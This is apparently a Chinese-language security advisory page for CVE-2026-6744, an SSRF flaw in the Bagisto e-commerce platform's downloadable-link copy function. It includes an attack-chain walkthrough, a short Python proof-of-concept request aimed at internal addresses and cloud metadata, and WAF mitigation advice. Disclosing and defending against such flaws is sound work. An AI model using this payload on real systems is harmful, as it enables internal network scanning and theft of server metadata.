IPBUF安全漏洞报告
English
CVE-2026-6744 CVSS 6.3 中危

CVE-2026-6744 Bagisto服务端请求伪造漏洞

披露日期: 2026-04-21
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6744
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Bagisto

相关标签

SSRFBagistoCVE-2026-6744服务端请求伪造E-commerce

漏洞概述

Bagisto是一款开源电商平台。该漏洞存在于Bagisto 2.3.15及之前版本的Downloadable Link Handler组件的`copy`函数中。由于对用户输入的URL缺乏充分校验,导致攻击者可诱导服务器向任意地址发起请求,造成服务端请求伪造(SSRF)。攻击可远程进行,且无需用户交互,可能导致内网探测或敏感信息泄露。

技术细节

漏洞位于Bagisto处理可下载链接的`copy`函数中。当用户试图复制下载链接时,应用程序会接收一个URL参数。由于代码未对目标URL进行有效的沙箱隔离或地址过滤,攻击者可以构造包含内网IP地址(如127.0.0.1, 169.254.169.254)或非标准端口的恶意请求。服务器后端会代为请求该恶意地址。根据CVSS评分,该漏洞需要低权限用户身份(PR:L),意味着攻击者通常需要注册并登录账户后才能触发该接口,从而利用SSRF读取本地元数据或对内网进行端口扫描。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标网站使用的是Bagisto电商平台,且版本在2.3.15及以下。
STEP 2
2. 获取凭证
由于需要低权限(PR:L),攻击者在网站注册一个普通用户账户并登录,获取有效的Session Cookie。
STEP 3
3. 漏洞利用
攻击者向Downloadable Link Handler的copy接口发送POST请求,在URL参数中填入内网地址(如http://127.0.0.1:22)。
STEP 4
4. 请求伪造
Bagisto服务器解析请求,并未过滤内网IP,直接向127.0.0.1:22发起连接,导致SSRF攻击成功。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Proof of Concept (Conceptual) # This script demonstrates how an attacker might trigger the SSRF. # It requires a valid session cookie (PR:L). import requests target_url = "http://target-bagisto-site.com/customer/downloadable-link/copy" headers = { "Cookie": "laravel_session=...;" # Replace with valid session } # Malicious payload targeting localhost (Example) payload = { "url": "http://127.0.0.1:8080/admin" } try: response = requests.post(target_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Request sent successfully. Check server logs for internal connection.") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

Bagisto <= 2.3.15

防御指南

临时缓解措施
建议在修复前,通过配置WAF规则拦截请求体中包含内网IP段(如127.0.0.0/8, 172.16.0.0/12等)的数据包,或者临时禁用下载链接复制功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表